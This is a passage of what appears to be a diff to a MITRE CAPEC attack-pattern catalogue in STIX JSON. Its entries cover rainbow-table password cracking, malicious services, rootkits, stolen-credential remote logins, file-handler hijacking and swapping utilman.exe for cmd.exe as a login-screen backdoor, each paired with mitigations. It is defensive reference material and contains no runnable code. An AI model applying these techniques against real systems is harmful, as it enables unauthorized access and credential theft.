the system dictates the tools required. For example, suppose the adversary wishes to leverage social engineering and convince a legitimate user to open a malicious file attached to a seemingly legitimate email. In this case, the adversary might require a tool capable of wrapping malicious code into an innocuous filetype (e.g., PDF, .doc, etc.)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust cybersecurity training for all employees.", + "id": "course-of-action--48d83564-0b90-4cb8-8edc-629d4918b8d3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ad56f58-fb37-408f-8a1b-2e3dfa28a602", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--48d83564-0b90-4cb8-8edc-629d4918b8d3", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement system antivirus software that scans all attachments before opening them.", + "id": "course-of-action--bf8bf5fa-93a1-46a0-8d7c-6889986d5167", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b1a3ebf-0fe8-4635-a763-7180f98545ce", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf8bf5fa-93a1-46a0-8d7c-6889986d5167", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regularly patch all software.", + "id": "course-of-action--6637d129-28e5-4beb-9e50-e0127d76b7ec", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--281bf316-0912-4859-9ffe-bb8474a7bad4", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6637d129-28e5-4beb-9e50-e0127d76b7ec", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Execute all suspicious files in a sandbox environment.", + "id": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker gets access to the database table where hashes of passwords are stored. They then use a rainbow table of pre-computed hash chains to attempt to look up the original password. Once the original password corresponding to the hash is obtained, the attacker uses the original password to gain access to the system.", + "external_references": [ + { + "external_id": "CAPEC-55", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/55.html" + }, + { + "external_id": "CWE-261", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/261.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-916", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/916.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Cracking", + "external_id": "T1110.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/002" + } + ], + "id": "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Rainbow Table Password Cracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "BusyBox 1.1.1 does not use a salt when generating passwords, which makes it easier for local users to guess passwords from a stolen password file using techniques such as rainbow tables. See also: CVE-2006-1058" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

    2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

  2. Obtain password hashes: An attacker gets access to the database table storing hashes of passwords or potentially just discovers a hash of an individual password.

    3. Techniques
    Obtain copy of database table or flat file containing password hashes (by breaking access controls, using SQL Injection, etc.)
    Obtain password hashes from platform-specific storage locations (e.g. Windows registry)
    Sniff network packets containing password hashes.

Exploit

  1. Run rainbow table-based password cracking tool: An attacker finds or writes a password cracking tool that uses a previously computed rainbow table for the right hashing algorithm. It helps if the attacker knows what hashing algorithm was used by the password system.

    2. Techniques
    Run rainbow table-based password cracking tool such as Ophcrack or RainbowCrack. Reduction function must depend on application's/system's password policy.
", + "x_capec_extended_description": "\n A password rainbow table stores hash chains for various passwords. A password chain is computed, starting from the original password, P, via a reduce(compression) function R and a hash function H. A recurrence relation exists where Xi+1 = R(H(Xi)), X0 = P. Then the hash chain of length n for the original password P can be formed: X1, X2, X3, ... , Xn-2, Xn-1, Xn, H(Xn). P and H(Xn) are then stored together in the rainbow table. Constructing the rainbow tables takes a very long time and is computationally expensive. A separate table needs to be constructed for the various hash algorithms (e.g. SHA1, MD5, etc.). However, once a rainbow table is computed, it can be very effective in cracking the passwords that have been hashed without the use of salt.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Hash of the original password is available to the attacker. For a better chance of success, an attacker should have more than one hash of the original password, and ideally the whole table.", + "Salt was not used to create the hash of the original password. Otherwise the rainbow tables have to be re-computed, which is very expensive and will make the attack effectively infeasible (especially if salt was added in iterations).", + "The system uses one factor password based authentication." + ], + "x_capec_resources_required": [ + "Rainbow table of password hash chains with the right algorithm used. A password cracking tool that leverages this rainbow table will also be required. Hash(es) of the password is required." + ], + "x_capec_skills_required": { + "Low": "A variety of password cracking tools are available that can leverage a rainbow table. The more difficult part is to obtain the password hash(es) in the first place." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use salt when computing password hashes. That is, concatenate the salt (random bits) with the original password prior to hashing it.", + "id": "course-of-action--54756aa7-5cd0-4c09-90b0-4bcb64715e00", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-55-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59fee1cf-5b04-404d-9ef4-ed4d63ce8317", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--54756aa7-5cd0-4c09-90b0-4bcb64715e00", + "target_ref": "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. Services are usually run with elevated privileges.", + "external_references": [ + { + "external_id": "CAPEC-550", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/550.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Create or Modify System Process", + "external_id": "T1543", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543" + } + ], + "id": "attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Install New Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit privileges of user accounts so new service creation can only be performed by authorized administrators.", + "id": "course-of-action--ed7ccb18-f2f9-4895-b561-75c72e739be9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-550-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f2eb507a-dfa5-4dd3-8046-bcd8964aa9ec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed7ccb18-f2f9-4895-b561-75c72e739be9", + "target_ref": "attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.", + "external_references": [ + { + "external_id": "CAPEC-551", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "description": "Create or Modify System Process", + "external_id": "T1543", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543" + } + ], + "id": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Modify Existing Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit privileges of user accounts so service changes can only be performed by authorized administrators. Also monitor any service changes that may occur inadvertently.", + "id": "course-of-action--f3d72fe1-750b-47c0-9526-4728852a4e5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-551-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0245e1a-1d11-480f-a078-397f1133e3d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f3d72fe1-750b-47c0-9526-4728852a4e5b", + "target_ref": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.", + "external_references": [ + { + "external_id": "CAPEC-552", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/552.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Rootkit", + "external_id": "T1014", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1014" + }, + { + "description": "Pre-OS Boot:Bootkit", + "external_id": "T1542.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/003" + }, + { + "description": "Boot or Logon Autostart Execution:Kernel Modules and Extensions", + "external_id": "T1547.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/006" + } + ], + "id": "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Install Rootkit ", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A rootkit may take the form of a hypervisor. A hypervisor is a software layer that sits between the operating system and the processor. It presents a virtual running environment to the operating system. An example of a common hypervisor is Xen. Because a hypervisor operates at a level below the operating system it can hide its existence from the operating system.", + "Similar to a rootkit, a bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent adversary access to privileged accounts necessary to install rootkits.", + "id": "course-of-action--7b0746b7-4370-4dbd-9a32-96187b4ac73f", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-552-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4d2cd3db-aad4-4f8f-b45c-6841ffaeef34", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b0746b7-4370-4dbd-9a32-96187b4ac73f", + "target_ref": "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-12-07T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attacks a system by bypassing some or all functionality intended to protect it. Often, a system user will think that protection is in place, but the functionality behind those protections has been disabled by the adversary.", + "external_references": [ + { + "external_id": "CAPEC-554", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/554.html" + }, + { + "external_id": "CWE-424", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/424.html" + }, + { + "external_id": "CWE-1299", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1299.html" + } + ], + "id": "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Functionality Bypass", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce", + "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.", + "external_references": [ + { + "external_id": "CAPEC-555", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/555.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Remote Services", + "external_id": "T1021", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1021" + }, + { + "description": "Email Collection:Remote Email Collection", + "external_id": "T1114.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1114/002" + }, + { + "description": "External Remote Services", + "external_id": "T1133", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1133" + } + ], + "id": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Remote Services with Stolen Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.", + "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable RDP, telnet, SSH and enable firewall rules to block such traffic. Limit users and accounts that have remote interactive login access. Remove the Local Administrators group from the list of groups allowed to login through RDP. Limit remote user permissions. Use remote desktop gateways and multifactor authentication for remote logins.", + "id": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-555-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02cc8969-deb0-4e79-ba08-2e68197ab5f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c080d71-9309-4804-877c-86e391e4b059", + "target_ref": "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. Applications can modify the file handler for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "external_references": [ + { + "external_id": "CAPEC-556", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/556.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Event Triggered Execution:Change Default File Association", + "external_id": "T1546.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1546/001" + } + ], + "id": "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Replace File Extension Handlers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Inspect registry for changes. Limit privileges of user accounts so changes to default file handlers can only be performed by authorized administrators.", + "id": "course-of-action--4709dd63-ad1f-4755-b03a-b1441d4a3f50", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-556-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--96425e94-0d20-4e81-a5f2-950f705d5102", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4709dd63-ad1f-4755-b03a-b1441d4a3f50", + "target_ref": "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-557", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/557.html" + } + ], + "id": "attack-pattern--ccf63cb4-ae14-4c51-a379-9dd09be8f078", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Schedule Software To Run", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits weaknesses in privilege management or access control to replace a trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.", + "external_references": [ + { + "external_id": "CAPEC-558", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/558.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Event Triggered Execution: Accessibility Features", + "external_id": "T1546.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1546/008" + } + ], + "id": "attack-pattern--d9069913-2a5f-4ad5-878e-73181f0b1067", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Trusted Executable", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Specific versions of Windows contain accessibility features that may be launched with a key combination before a user has logged in (for example when they are on the Windows Logon screen). On Windows XP and Windows Server 2003/R2, the program (e.g. \"C:\\Windows\\System32\\utilman.exe\") may be replaced with cmd.exe (or another program that provides backdoor access). Then pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over RDP will cause the replaced file to be executed with SYSTEM privileges." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary sends disruptive signals at a target satellite using a rogue uplink station to disrupt the intended transmission. Those within the satellite's footprint are prevented from reaching the satellite's targeted or neighboring channels. The satellite's footprint size depends upon its position in the sky; higher orbital satellites cover multiple continents.", + "external_references": [ + { + "external_id": "CAPEC-559", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/559.html" + }, + { + "description": "Small Media, Satellite Jamming in Iran: A War over Airwaves, 2012--11", + 